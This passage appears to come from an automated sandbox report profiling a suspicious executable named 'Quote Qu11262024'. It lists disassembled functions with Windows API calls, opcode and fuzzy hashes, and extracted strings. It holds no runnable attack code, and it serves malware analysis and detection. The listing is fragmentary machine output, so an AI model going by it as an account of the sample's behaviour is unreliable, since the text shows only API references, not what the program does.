                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                    • API String ID: 3510742995-272990098
                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                    • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                    • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2241099983-0
                                                                                                    • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                    • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                    APIs
                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4053608372-0
                                                                                                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 4247780290-0
                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1471605966-0
                                                                                                    • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                    • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                    APIs
                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                    • String ID: \StringFileInfo\
                                                                                                    • API String ID: 102104167-2245444037
                                                                                                    • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                    • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                    • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$PlacementWindow
                                                                                                    • String ID: AE
                                                                                                    • API String ID: 3548547718-685266089
                                                                                                    • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                    • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                    • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                    • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _memicmpwcslen
                                                                                                    • String ID: @@@@$History
                                                                                                    • API String ID: 1872909662-685208920
                                                                                                    • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                    • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                    • String ID: </%s>
                                                                                                    • API String ID: 3400436232-259020660
                                                                                                    • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                    • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendmemset
                                                                                                    • String ID: AE$"
                                                                                                    • API String ID: 568519121-1989281832
                                                                                                    • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                    • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                    • String ID: caption
                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                    • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                    • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 210187428-168460110
                                                                                                    • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                    • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                    • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                    • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                    • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                    • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                    Memory Dump Source
